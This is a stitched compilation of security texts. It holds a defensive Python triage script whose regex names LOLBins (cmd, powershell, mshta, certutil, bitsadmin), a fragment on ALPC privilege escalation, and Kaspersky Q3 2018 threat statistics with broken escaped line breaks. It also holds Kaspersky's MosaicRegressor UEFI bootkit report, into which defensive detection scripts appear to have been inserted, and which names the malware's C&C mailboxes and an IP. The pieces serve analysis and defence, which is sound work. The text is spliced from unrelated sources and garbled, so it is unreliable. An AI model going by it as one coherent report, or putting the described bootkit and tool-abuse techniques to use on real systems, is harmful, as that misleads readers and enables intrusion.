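# DeepLink values a genuine shortcut is expected to carry (assumption: adapt to your environment).
ALLOWED_TARGETS = (
    re.compile(r"^%windir%\\system32\\control\.exe(\s+/name\s+\S+)?$", re.IGNORECASE),
    re.compile(r"^ms-settings:[a-z0-9\-]*$", re.IGNORECASE),
)

# Interpreters and LOLBins that have no business in a settings shortcut.
LOLBIN_RE = re.compile(
    r"\b(cmd|powershell|pwsh|mshta|rundll32|regsvr32|wscript|cscript|certutil|bitsadmin|msiexec)(\.exe)?\b",
    re.IGNORECASE,
)


def _local(tag: str) -> str:
    """Strip the XML namespace so matching does not depend on the exact schema URI."""
    return tag.rsplit("}", 1)[-1]


def extract_deeplinks(xml_text: str) -> list[str]:
    """Return every DeepLink value in the file, whatever namespace it was written under."""
    root = ET.fromstring(xml_text)
    return [(el.text or "").strip() for el in root.iter() if _local(el.tag) == "DeepLink"]


def triage_settingcontent(xml_text: str) -> list[dict]:
    """Flag DeepLinks that are off the allow-list, naming the interpreter they invoke if any."""
    findings = []
    for link in extract_deeplinks(xml_text):
        if any(p.match(link) for p in ALLOWED_TARGETS):
            continue
        reason = "deeplink not on allow-list"
        m = LOLBIN_RE.search(link)
        if m:
            reason = f"deeplink invokes {m.group(1).lower()}"
        findings.append({"deeplink": link, "reason": reason})
    return findings


if __name__ == "__main__":
    import sys
    for path in sys.argv[1:]:
        with open(path, encoding="utf-8-sig") as fh:
            for f in triage_settingcontent(fh.read()):
                print(f"{path}: {f['reason']}: {f['deeplink']}")
```

Run it over any `*.SettingContent-ms` files carved from mail attachments or ISO/PDF containers; the allow-list approach catches payloads the interpreter regex does not know about (a renamed binary, for instance), and the regex only serves to make the finding more descriptive.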
The escalation itself is straightforward: the attacker uses the ALPC flaw to change the access rights of a system file so that it becomes writable by a low-privileged user, and then overwrites that file as an unprivileged user. \n\n## Attacks via web resources\n\n_The statistics in this chapter are based on Web Anti-Virus, which protects users when malicious objects are downloaded from malicious/infected web pages. Malicious websites are created by cybercriminals, while web resources with user-created content (for example, forums), as well as hacked legitimate resources, can be infected._\n\n### Countries where online resources are seeded with malware\n\n_The following statistics are based on the physical location of the online resources used in attacks and blocked by our antivirus components (web pages containing redirects to exploits, sites containing exploits and other malware, botnet command centers, etc.). Any unique host could be the source of one or more web attacks. In order to determine the geographical source of web-based attacks, domain names are matched against their actual domain IP addresses, and then the geographical location of a specific IP address (GEOIP) is established._\n\nIn the third quarter of 2018, Kaspersky Lab solutions blocked **947,027,517** attacks launched from web resources located in 203 countries around the world. **246,695,333** unique URLs were recognized as malicious by web antivirus components.\n\n_Distribution of web attack sources by country, Q3 2018_ [(download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/11/09151845/it-threat-evolution-q3-2018-statistics_19_en.png>)\n\nIn Q3, the USA (52.81%) was home to most sources of web attacks. 
Overall, the leading four sources of web attacks remained unchanged from Q2: the USA is followed by the Netherlands (16.26%), Germany (6.94%) and France (4.4%).\n\n### Countries where users faced the greatest risk of online infection\n\nTo assess the risk of online infection faced by users in different countries, we calculated the percentage of Kaspersky Lab users on whose computers Web Anti-Virus was triggered in each country during the quarter. The resulting data provides an indication of the aggressiveness of the environment in which computers operate in different countries.\n\nThis rating only includes attacks by _malware-class_ malicious programs; it does not include Web Anti-Virus detections of potentially dangerous or unwanted programs such as RiskTool or adware.\n\n| Country* | %** \n---|---|--- \n1 | Venezuela | 35.88 \n2 | Albania | 32.48 \n3 | Algeria | 32.41 \n4 | Belarus | 31.08 \n5 | Armenia | 29.16 \n6 | Ukraine | 28.67 \n7 | Moldova | 28.64 \n8 | Azerbaijan | 26.67 \n9 | Kyrgyzstan | 25.80 \n10 | Serbia | 25.38 \n11 | Mauritania | 24.89 \n12 | Indonesia | 24.68 \n13 | Romania | 24.56 \n14 | Qatar | 23.99 \n15 | Kazakhstan | 23.93 \n16 | Philippines | 23.84 \n17 | Lithuania | 23.70 \n18 | Djibouti | 23.70 \n19 | Latvia | 23.09 \n20 | Honduras | 22.97 \n \n_* Countries with relatively few Kaspersky Lab users (under 10,000) are excluded._ \n_** Unique users targeted by malware-class attacks as a percentage of all unique users of Kaspersky Lab products in the country._\n\nOn average, 18.92% of internet users' computers worldwide experienced at least one _malware-class_ web attack.\n\n_Geography of malicious web attacks in Q3 2018 _ [(download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/11/09151916/it-threat-evolution-q3-2018-statistics_20_en.png>)\n\n## Local threats\n\n_Local infection statistics for user computers are an important indicator: they reflect threats that have penetrated computer systems by infecting files or 
via removable media, or initially got on the computer in an encrypted format (for example, programs integrated in complex installers, encrypted files, etc.)._\n\n_Data in this section is based on analyzing statistics produced by antivirus scans of files on the hard drive at the moment they were created or accessed, and the results of scanning removable storage media. Analysis takes account of the malicious programs identified on user computers or on removable media connected to computers \u2013 flash drives, camera memory cards, phones and external hard drives._\n\nIn Q3 2018, Kaspersky Lab's file antivirus detected **239,177,356** unique malicious and potentially unwanted objects.\n\n### Countries where users faced the highest risk of local infection\n\nFor each country, we calculated the percentage of Kaspersky Lab product users on whose computers File Anti-Virus was triggered during the reporting period. These statistics reflect the level of personal computer infection in different countries.\n\nThe rating includes only malware-class attacks. 
It does not include File Anti-Virus detections of potentially dangerous or unwanted programs such as RiskTool or adware.\n\n| Country* | %** \n---|---|--- \n1 | Uzbekistan | 54.93 \n2 | Afghanistan | 54.15 \n3 | Yemen | 52.12 \n4 | Turkmenistan | 49.61 \n5 | Tajikistan | 49.05 \n6 | Laos | 47.93 \n7 | Syria | 47.45 \n8 | Vietnam | 46.07 \n9 | Bangladesh | 45.93 \n10 | Sudan | 45.30 \n11 | Ethiopia | 45.17 \n12 | Myanmar | 44.61 \n13 | Mozambique | 42.65 \n14 | Kyrgyzstan | 42.38 \n15 | Iraq | 42.25 \n16 | Rwanda | 42.06 \n17 | Algeria | 41.95 \n18 | Cameroon | 40.98 \n19 | Malawi | 40.70 \n20 | Belarus | 40.66 \n \n_* Countries with relatively few Kaspersky Lab users (under 10,000) are excluded._ \n_** Unique users on whose computers **malware-class** local threats were blocked, as a percentage of all unique users of Kaspersky Lab products in the country._\n\n_Geography of local malware attacks in Q3 2018_ [(download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/11/09151949/it-threat-evolution-q3-2018-statistics_21_en.png>)\n\nOn average, 22.53% of computers globally faced at least one malware-class local threat in Q3.\n\nIT threat evolution Q3 2018. Statistics\nID SECURELIST:2E379BD626ECA8E38B18EDCA6CD22F3C Type securelist Published 2018-11-12T10:00:55 Modified 2018-11-12T10:00:55 CVSS 9.3 (AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/)\nhttps://securelist.com/it-threat-evolution-q3-2018-statistics/88689/\n\nType blog CVE CVE-2018-0802 Last seen 2020-10-07T09:55:20\nDescription\n[ Part II. Technical details (PDF)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/10/07080558/MosaicRegressor_Technical-details.pdf>)\n\nUEFI (or Unified Extensible Firmware Interface) has become a prominent technology that is embedded within designated chips on modern day computer systems. 
Replacing the legacy BIOS, it is typically used to facilitate the machine's boot sequence and load the operating system, while using a feature-rich environment to do so. At the same time, it has become the target of threat actors to carry out exceptionally persistent attacks.\n\nOne such attack has become the subject of our research, where we found a compromised UEFI firmware image that contained a malicious implant. This implant served as means to deploy additional malware on the victim computers, one that we haven't come across thus far. To the best of our knowledge, this is the second known public case where malicious UEFI firmware in use by a threat actor was found in the wild.\n\nThroughout this blog we will elaborate on the following key findings:\n\n * We discovered rogue UEFI firmware images that were modified from their benign counterpart to incorporate several malicious modules;\n * The modules were used to drop malware on the victim machines. This malware was part of a wider malicious framework that we dubbed MosaicRegressor;\n * Components from that framework were discovered in a series of targeted attacks pointed towards diplomats and members of an NGO from Africa, Asia and Europe, all showing ties in their activity to North Korea;\n * Code artefacts in some of the framework's components and overlaps in C&C infrastructure used during the campaign suggest that a Chinese-speaking actor is behind these attacks, possibly having connections to groups using the Winnti backdoor;\n\nThe attack was found with the help of [Firmware Scanner](<https://www.kaspersky.com/enterprise-security/wiki-section/products/anti-rootkit-and-remediation-technology>), which has been integrated into Kaspersky products since the beginning of 2019. 
This technology was developed to specifically detect threats hiding in the ROM BIOS, including UEFI firmware images.\n\n## Current State of the Art\n\nBefore we dive deep into our findings, let us have a quick recap of what UEFI is and how it was leveraged for attacks thus far. In a nutshell, UEFI is a specification that defines the structure and operation of low-level platform firmware, so as to allow the operating system to interact with it at various stages of its activity.\n\nThis interaction happens most notably during the boot phase, where UEFI firmware facilitates the loading of the operating system itself. That said, it can also occur when the OS is already up and running, for example in order to update the firmware through a well-defined software interface.\n\nConsidering the above, UEFI firmware makes for a perfect mechanism of persistent malware storage. A sophisticated attacker can modify the firmware in order to have it deploy malicious code that will be run after the operating system is loaded. Moreover, since it is typically shipped within SPI flash storage that is soldered to the computer's motherboard, such implanted malware will be resistant to OS reinstallation or replacement of the hard drive. \nThis type of attack has occurred in several instances in the past few years. A prominent example is the LoJax implant [discovered](<https://www.welivesecurity.com/2018/09/27/lojax-first-uefi-rootkit-found-wild-courtesy-sednit-group/>) by our friends at ESET in 2018, in which patched UEFI modules of the LoJack anti-theft software (also known as Computrace) were used to deploy a malicious user mode agent in a number of Sofacy / Fancy Bear victim machines. 
The dangers of Computrace itself [were described](<https://securelist.com/absolute-computrace-revisited/58278/>) by our colleagues from the Global Research and Analysis Team (GReAT) back in 2014.\n\nAnother example is the source code of a UEFI bootkit named VectorEDK, which was discovered in the Hacking Team leaks from 2015. This code consisted of a set of UEFI modules that could be incorporated into the platform firmware in order to have it deploy a backdoor to the system which will be run when the OS loads, or redeploy it if it was wiped. Despite the fact that VectorEDK's code was made public and [can be found](<https://github.com/hackedteam/vector-edk>) on GitHub nowadays, we had not witnessed actual evidence of it in the wild before our latest finding.\n\n## Our Discovery\n\nDuring an investigation, we came across several suspicious UEFI firmware images. A deeper inspection revealed that they contained four components that had an unusual proximity in their assigned GUID values, namely two DXE drivers and two UEFI applications. After further analysis we were able to determine that they were based on the leaked source code of HackingTeam's VectorEDK bootkit, with minor customizations.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/10/01141821/sl_MosaicRegressor_01.png>)\n\n**_Rogue components found within the compromised UEFI firmware_**\n\nThe goal of these added modules is to invoke a chain of events that would result in writing a malicious executable named 'IntelUpdate.exe' to the victim's Startup folder. Thus, when Windows is started the written malware would be invoked as well. Apart from that, the modules would ensure that if the malware file is removed from the disk, it will be rewritten. 
Since this logic is executed from the SPI flash, there is no way to avoid this process other than eliminating the malicious firmware.\n\nFollowing is an outline of the components that we identified:\n\n * **SmmInterfaceBase**: a DXE driver that is based on Hacking Team's 'rkloader' component and intended to deploy further components of the bootkit for later execution. This is done by registering a callback that will be invoked upon an event of type EFI_EVENT_GROUP_READY_TO_BOOT. The event occurs at a point when control can be passed to the operating system's bootloader, effectively allowing the callback to take effect before it. The callback will in turn load and invoke the 'SmmAccessSub' component.\n * **Ntfs**: a driver written by Hacking Team that is used to detect and parse the NTFS file system in order to allow conducting file and directory operations on the disk.\n * **SmmReset**: a UEFI application intended to mark the firmware image as infected. This is done by setting the value of a variable named 'fTA' to a hard-coded GUID. The application is based on a component from the original Vector-EDK code base that is named 'ReSetfTA'.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/10/01141941/sl_MosaicRegressor_02.png>)\n\n**_Setting of the fTA variable with a predefined GUID to mark the execution of the bootkit_**\n\n * **SmmAccessSub**: the main bootkit component that serves as a persistent dropper for a user-mode malware. It is executed by the callback registered during the execution of 'SmmInterfaceBase', and takes care of writing a binary embedded within it as a file named 'IntelUpdate.exe' to the startup directory on disk. This allows the binary to execute when Windows is up and running. \nThis is the only proprietary component amongst the ones we inspected, which was mostly written from scratch and makes only slight use of code from a Vector-EDK application named 'fsbg'. 
It conducts the following actions to drop the intended file to disk:\n\n * Bootstraps pointers for the SystemTable, BootServices and RuntimeServices global structures.\n * Tries to get a handle to the currently loaded image by invoking the HandleProtocol method with the EFI_LOADED_IMAGE_PROTOCOL_GUID argument.\n * If the handle to the current image is obtained, the module attempts to find the root drive in which Windows is installed by enumerating all drives and checking that the '\\Windows\\System32' directory exists on them. A global EFI_FILE_PROTOCOL object that corresponds to the drive will be created at this point and referenced to open any further directories or files in this drive.\n * If the root drive is found in the previous stage, the module looks for a marker file named 'setupinf.log' under the Windows directory and proceeds only if it doesn't exist. In the absence of this file, it is created.\n * If the creation of 'setupinf.log' succeeds, the module goes on to check if the 'Users' directory exists under the same drive.\n * If the 'Users' directory exists, it writes the 'IntelUpdate.exe' file (embedded in the UEFI application's binary) under the 'ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Startup' directory in the root drive.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/10/01142051/sl_MosaicRegressor_03.png>)\n\n**_Code from 'SmmAccessSub' used to write the embedded 'IntelUpdate.exe' binary to the Windows Startup directory_**\n\nUnfortunately, we were not able to determine the exact infection vector that allowed the attackers to overwrite the original UEFI firmware. Our detection logs show that the firmware itself was found to be malicious, but no suspicious events preceded it. Due to this, we can only speculate how the infection could have happened.\n\nOne option is through physical access to the victim's machine. 
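Two of the artefacts described for SmmAccessSub and SmmReset above can be hunted for in a raw SPI flash dump without any vendor tooling: the dropper carries a complete Windows executable inside an EFI application, and the strings it uses ('IntelUpdate.exe', 'setupinf.log', the 'fTA' variable name) sit in the image. A UEFI volume legitimately contains PE/COFF images, but they carry an EFI subsystem value (10 to 13) in the optional header; a PE whose subsystem says Windows GUI/CUI, nested inside the flash, is what a user-mode payload embedded in a DXE driver or UEFI application looks like. The Python below is an added example, not Kaspersky's Firmware Scanner or any code from the report. It walks a dump for PE headers, reports each one's subsystem, and searches for the marker strings; the sample image is constructed here from minimal hand-built PE headers and 0xFF filler (erased flash), and the subsystem heuristic is mine, so anything it flags still needs a manual look:

```python
import struct
import sys

# PE optional-header Subsystem values (Microsoft PE/COFF specification).
EFI_SUBSYSTEMS = {10: "EFI_APPLICATION", 11: "EFI_BOOT_SERVICE_DRIVER",
                  12: "EFI_RUNTIME_DRIVER", 13: "EFI_ROM"}
OTHER_SUBSYSTEMS = {1: "NATIVE", 2: "WINDOWS_GUI", 3: "WINDOWS_CUI"}

# Strings the report attributes to the bootkit. UEFI variable names are CHAR16,
# so 'fTA' is searched only as UTF-16LE to avoid 3-byte ASCII false positives.
MARKERS = {
    "IntelUpdate.exe": ("ascii", "utf-16-le"),
    "setupinf.log": ("ascii", "utf-16-le"),
    "SmmAccessSub": ("ascii", "utf-16-le"),
    "SmmInterfaceBase": ("ascii", "utf-16-le"),
    "fTA": ("utf-16-le",),
}


def parse_pe_header(image: bytes, off: int):
    """Return basic header fields if a well-formed PE image starts at `off`, else None."""
    if image[off:off + 2] != b"MZ" or off + 0x40 > len(image):
        return None
    e_lfanew = struct.unpack_from("<I", image, off + 0x3C)[0]
    pe = off + e_lfanew
    # need the 4-byte signature, the 20-byte COFF header and 70 bytes of optional header
    if e_lfanew < 0x40 or e_lfanew > 0x1000 or pe + 94 > len(image):
        return None
    if image[pe:pe + 4] != b"PE\0\0":
        return None
    machine, _, _, _, _, opt_size, _ = struct.unpack_from("<HHIIIHH", image, pe + 4)
    opt = pe + 24
    magic = struct.unpack_from("<H", image, opt)[0]          # 0x10B = PE32, 0x20B = PE32+
    if magic not in (0x10B, 0x20B) or opt_size < 70:
        return None
    subsystem = struct.unpack_from("<H", image, opt + 68)[0]  # same offset for PE32 and PE32+
    return {
        "offset": off,
        "machine": machine,
        "pe32plus": magic == 0x20B,
        "subsystem": subsystem,
        "subsystem_name": EFI_SUBSYSTEMS.get(subsystem) or OTHER_SUBSYSTEMS.get(subsystem, "UNKNOWN"),
        "suspicious": subsystem not in EFI_SUBSYSTEMS,
    }


def find_pe_images(image: bytes) -> list[dict]:
    """Every PE header in the dump, including ones nested inside another module's data."""
    found, pos = [], image.find(b"MZ")
    while pos != -1:
        hdr = parse_pe_header(image, pos)
        if hdr:
            found.append(hdr)
        pos = image.find(b"MZ", pos + 1)
    return found


def find_markers(image: bytes) -> dict[str, list[tuple[str, int]]]:
    """First offset of each bootkit string, per encoding in which it may be stored."""
    hits = {}
    for text, encodings in MARKERS.items():
        for enc in encodings:
            off = image.find(text.encode(enc))
            if off != -1:
                hits.setdefault(text, []).append((enc, off))
    return hits


def _fake_pe(subsystem: int, pe32plus: bool = True) -> bytes:
    """Minimal PE header (no sections), used only to build the constructed sample image."""
    e_lfanew, opt_size = 0x80, (0xF0 if pe32plus else 0xE0)
    dos = (b"MZ" + b"\0" * 0x3A + struct.pack("<I", e_lfanew)).ljust(e_lfanew, b"\0")
    coff = struct.pack("<HHIIIHH", 0x8664 if pe32plus else 0x14C, 1, 0, 0, 0, opt_size, 0x0102)
    opt = bytearray(opt_size)
    struct.pack_into("<H", opt, 0, 0x20B if pe32plus else 0x10B)
    struct.pack_into("<H", opt, 68, subsystem)
    return dos + b"PE\0\0" + coff + bytes(opt)


def build_sample_image() -> bytes:
    """Constructed SPI dump: a DXE driver, then an EFI app carrying a Windows PE plus the marker strings."""
    erased = b"\xff" * 4096
    dxe_driver = _fake_pe(11)
    dropped = _fake_pe(2, pe32plus=False) + b"\0" * 16 + "IntelUpdate.exe".encode("utf-16-le") + b"\0\0"
    dropper = (_fake_pe(10) + b"\0" * 32 + b"setupinf.log\0"
               + "fTA".encode("utf-16-le") + b"\0\0" + dropped)
    return erased + dxe_driver + erased + dropper + erased


def scan(image: bytes) -> dict:
    return {"pe_images": find_pe_images(image), "markers": find_markers(image)}


if __name__ == "__main__":
    data = open(sys.argv[1], "rb").read() if len(sys.argv) > 1 else build_sample_image()
    report = scan(data)
    for pe in report["pe_images"]:
        flag = "SUSPICIOUS" if pe["suspicious"] else "ok"
        print(f"PE @ 0x{pe['offset']:08x} subsystem={pe['subsystem_name']} {flag}")
    for text, hits in report["markers"].items():
        print(f"marker {text!r}: {hits}")
```

Pass the path of a flash dump (for example one taken with `chipsec_util spi dump` or a hardware programmer) as the only argument; without one it scans the constructed sample. Compressed firmware volumes (LZMA/Tiano sections) must be unpacked first, for instance with UEFITool, or the nested PE will not be visible to a plain byte search.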
The physical-access hypothesis is partly supported by Hacking Team's leaked material, according to which the installation of firmware infected with VectorEDK requires booting the target machine from a USB key. Such a USB key would contain a special update utility that can be generated with a designated builder provided by the company. We found a Q-flash update utility in our inspected firmware, which could have been used for such a purpose as well.\n\nFurthermore, the leaks reveal that the UEFI infection capability (which is referred to by Hacking Team as 'persistent installation') was tested on ASUS X550C laptops. These make use of UEFI firmware by AMI which is very similar to the one we inspected. For this reason we can assume that Hacking Team's method of patching the firmware would work in our case as well.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/10/01142215/sl_MosaicRegressor_04.png>)\n\n**_Excerpt from a Hacking Team manual for deployment of infected UEFI firmware, also known as 'persistent installation'_**\n\nOf course, we cannot exclude other possibilities whereby rogue firmware was pushed remotely, perhaps through a compromised update mechanism. Such a scenario would typically require exploiting vulnerabilities in the BIOS update authentication process. While this could be the case, we don't have any evidence to support it.\n\n## The Bigger Picture: Enter MosaicRegressor Framework\n\nWhile Hacking Team's original bootkit was used to write one of the company's backdoors to disk, known as 'Soldier', 'Scout' or 'Elite', the UEFI implant we investigated deployed a new piece of malware that we haven't seen thus far. We decided to look for similar samples that share strings and implementation traits with the dropped binary. 
Consequently, the samples that we found suggested that the dropped malware was only one variant derived from a wider framework that we named MosaicRegressor.\n\nMosaicRegressor is a multi-stage and modular framework aimed at espionage and data gathering. It consists of downloaders, and occasionally multiple intermediate loaders, that are intended to fetch and execute payloads on victim machines. The modular design helps the attackers conceal the wider framework from analysis and deploy components to target machines only on demand. Indeed, we were able to obtain only a handful of payload components during our investigation.\n\nThe downloader components of MosaicRegressor share common business logic, whereby the implants contact a C&C, download further DLLs from it and then load and invoke specific export functions from them. The execution of the downloaded modules usually results in output that can in turn be sent back to the C&C.\n\nHaving said that, the various downloaders we observed made use of different communication mechanisms when contacting their C&Cs:\n\n * CURL library (HTTP/HTTPS)\n * BITS transfer interface\n * WinHTTP API\n * POP3S/SMTPS/IMAPS, payloads transferred in e-mail messages\n\nThe last variant in the list is distinct for its use of e-mail boxes to host the requested payload. The payload intended to run by this implant can also generate an output upon invocation, which can be later forwarded to a 'feedback' mail address, where it will likely be collected by the attackers.\n\nThe mail boxes used for this purpose reside on the 'mail.ru' domain, and are accessed using credentials that are hard-coded in the malware's binary. To fetch the requested file from the target inbox, the mail-based downloader (MailReg) enters an infinite loop where it tries to connect to the "pop.mail.ru" server every 20 minutes, and makes use of the first pair of credentials that allow a successful connection. 
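A fixed 20-minute poll of pop.mail.ru is the kind of cadence that stands out in proxy or NetFlow data even though every connection goes to a legitimate mail provider over TLS. The Python below is an added example, not code from Kaspersky's analysis: it groups connection records per (host, destination, port), computes the gaps between consecutive connections and flags pairs whose gaps cluster tightly around one period, which is how a scheduler loop differs from a person reading mail. The log lines are constructed here (one host beaconing MailReg-style, one behaving like a user), and the thresholds (at least six connections, coefficient of variation of the gaps under 10%) are assumptions to tune per environment:

```python
import statistics
from collections import defaultdict
from datetime import datetime

# Constructed connection log: timestamp, source host, destination, port.
# ws-17 polls pop.mail.ru every 20 minutes with a few seconds of jitter; ws-42 reads mail like a person.
SAMPLE_LOG = """\
2019-03-04T08:00:05Z ws-17 pop.mail.ru 995
2019-03-04T08:03:41Z ws-42 pop.mail.ru 995
2019-03-04T08:20:06Z ws-17 pop.mail.ru 995
2019-03-04T08:40:04Z ws-17 pop.mail.ru 995
2019-03-04T08:57:12Z ws-42 pop.mail.ru 995
2019-03-04T09:00:07Z ws-17 pop.mail.ru 995
2019-03-04T09:20:05Z ws-17 pop.mail.ru 995
2019-03-04T09:31:55Z ws-42 pop.mail.ru 995
2019-03-04T09:40:06Z ws-17 pop.mail.ru 995
2019-03-04T10:00:04Z ws-17 pop.mail.ru 995
2019-03-04T10:02:30Z ws-42 pop.mail.ru 995
2019-03-04T10:20:05Z ws-17 pop.mail.ru 995
2019-03-04T10:48:09Z ws-42 pop.mail.ru 995
2019-03-04T11:40:27Z ws-42 pop.mail.ru 995
"""


def parse_log(text):
    """Yield (timestamp, host, destination, port) tuples from the whitespace-separated log."""
    for line in text.splitlines():
        if not line.strip():
            continue
        ts, host, dst, port = line.split()
        yield datetime.strptime(ts, "%Y-%m-%dT%H:%M:%SZ"), host, dst, int(port)


def find_beacons(records, min_events=6, max_cv=0.10):
    """Return the (host, dst, port) pairs whose connections recur at a near-constant interval.

    Jitter is measured as the coefficient of variation (population stdev / mean) of the
    inter-connection gaps: a sleep-based loop yields a few percent, human activity far more.
    """
    by_pair = defaultdict(list)
    for ts, host, dst, port in records:
        by_pair[(host, dst, port)].append(ts)
    beacons = []
    for (host, dst, port), times in by_pair.items():
        if len(times) < min_events:
            continue
        times.sort()
        gaps = [(b - a).total_seconds() for a, b in zip(times, times[1:])]
        mean = statistics.mean(gaps)
        cv = statistics.pstdev(gaps) / mean if mean else float("inf")
        if cv <= max_cv:
            beacons.append({"host": host, "dst": dst, "port": port,
                            "period_s": round(mean), "count": len(times), "jitter": round(cv, 4)})
    return beacons


if __name__ == "__main__":
    for b in find_beacons(parse_log(SAMPLE_LOG)):
        print(f"{b['host']} -> {b['dst']}:{b['port']} every ~{b['period_s']}s "
              f"x{b['count']} (cv={b['jitter']})")
```

On real data, feed it a day of flow or proxy records per host and then whitelist the expected periodic talkers (update checks, monitoring agents) by destination rather than loosening the jitter threshold; a 20-minute period to a consumer mail host from a workstation that has no mail client configured is worth a ticket on its own.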
The e-mails used for login (without their passwords) and corresponding feedback mail are specified in the table below:\n\n**Login mail** | **Feedback mail** \n---|--- \nthtgoolnc@mail.ru | thgetmmun@mail.ru \nthbububugyhb85@mail.ru | thyhujubnmtt67@mail.ru \n \nThe downloaders can also be split in two distinct types, the "plain" one just fetching the payload, and the "extended" version that also collects system information:\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/10/01142407/sl_MosaicRegressor_05.png>)\n\n**_Structure of the log file written by BitsRegEx, strings marked in red are the original fields that appear in that file_**\n\nWe were able to obtain only one variant of the subsequent stage, which installs itself via autorun registry values and acts as another loader for the components that are supposed to be fetched by the initial downloader. These components are also just intermediate loaders for the next stage DLLs. Ultimately, there is no concrete business logic in the persistent components, as it is provided by the C&C server in the form of DLL files, most of them temporary.\n\nWe have observed one such library, "**load.rem**", that is a basic document stealer, fetching files from the "Recent Documents" directory and archiving them with a password, likely as a preliminary step before exfiltrating the result to the C&C by another component.\n\nThe following figure describes the full flow and connection between the components that we know about. The colored elements are the components that we obtained and gray ones are the ones we didn't:\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/10/01142517/sl_MosaicRegressor_06.png>)\n\n**_Flow from BitsRegEx to execution of intermediate loaders and final payload_**\n\n \n\n## Who were the Targets?\n\nAccording to our telemetry, there were several dozen victims who received components from the MosaicRegressor framework between 2017 and 2019. 
These victims included diplomatic entities and NGOs in Africa, Asia and Europe. Only two of them were also infected with the UEFI bootkit in 2019, predating the deployment of the BitsReg component.\n\nBased on the affiliation of the discovered victims, we could determine that all had some connection to the DPRK, be it non-profit activity related to the country or actual presence within it. This common theme can be reinforced through one of the infection vectors used to deliver the malware to some of the victims, which was SFX archives pretending to be documents discussing various subjects related to North Korea. Those were bundled with both an actual document and MosaicRegressor variants, having both executed when the archive is opened. Examples for the lure documents can be seen below.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/10/01142633/sl_MosaicRegressor_07.png>)\n\n_**Examples of lure documents bundled to malicious SFX archives sent to MosaicRegressor victims, discussing DPRK related topics**_\n\n \n\n## Who is behind the attack?\n\nWhen analyzing MosaicRegressor's variants, we noticed several interesting artefacts that provided us with clues on the identity of the actor behind the framework. As far as we can tell, the attacks were conducted by a Chinese-speaking actor, who may have previously used the Winnti backdoor. We found the following evidence to support this:\n\n * We spotted many strings used in the system information log generated by the BitsRegEx variant that contain the character sequence '0xA3, 0xBA'. This is an invalid sequence for a UTF8 string and the LATIN1 encoding translates these symbols to a pound sign followed by a "masculine ordinal indicator" ("\u00a3\u00ba"). An attempt to iterate over all available iconv symbol tables, trying to convert the sequence to UTF-8, produces possible candidates that give a more meaningful interpretation. 
Given the context of the string preceding the symbol and the line feed symbols following it, the best match is the "FULL-WIDTH COLON" Unicode character translated from either the Chinese or Korean code pages (i.e. CP936 and CP949).\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/10/01142816/sl_MosaicRegressor_08.png>)\n\n_Figure_: The BitsRegEx system information log making use of the character sequence 0xA3, 0xBA, likely used to represent a full-width colon, according to code pages CP936 and CP949.\n\n * Another artefact we found was a file resource in CurlReg samples that contained a language identifier set to 2052 ("zh-CN").\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/10/01142900/sl_MosaicRegressor_09.png>)\n\n**_Chinese language artefact in the resource section of a CurlReg sample_**\n\n * We detected an OLE2 object extracted from a document armed with the CVE-2018-0802 vulnerability, which was produced by the so-called 'Royal Road' / '8.t' document builder and used to drop a CurlReg variant. To the best of our knowledge, this builder is commonly used by Chinese-speaking threat actors.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/10/01142954/sl_MosaicRegressor_10.png>)\n\n**_Excerpt from the OLE2 object found within a 'Royal Road' weaponized document, delivering the CurlReg variant_**\n\n * A C&C address (103.82.52[.]18) found in one of MosaicRegressor's variants (MD5:3B58E122D9E17121416B146DAAB4DB9D) was observed in use by the 'Winnti umbrella and linked groups', according to a publicly available [report](<https://401trg.com/burning-umbrella/>). 
Since this is the only link between our findings and any of the groups using the Winnti backdoor, we estimate with low confidence that it is indeed responsible for the attacks.\n\n## Conclusion\n\nThe attacks described in this blog post demonstrate the lengths an actor will go to in order to gain the highest level of persistence on a victim machine. It is highly uncommon to see compromised UEFI firmware in the wild, usually due to the low visibility into attacks on firmware, the advanced measures required to deploy it on a target's SPI flash chip, and the high stakes of burning a sensitive toolset or assets when doing so.\n\nWith this in mind, we see that UEFI continues to be a point of interest to APT actors, while being largely overlooked by security vendors. The combination of our technology and our understanding of current and past campaigns leveraging infected firmware helps us monitor and report on future attacks against such targets.\n\nThe full details of this research, as well as future updates on the underlying threat actor, are available to customers of the APT reporting service through our Threat Intelligence Portal.\n\n## IoCs\n\nThe following IoC list is not complete. If you want more information about the APT discussed here, a full IoC list and YARA rules are available to customers of Kaspersky Threat Intelligence Reports. 
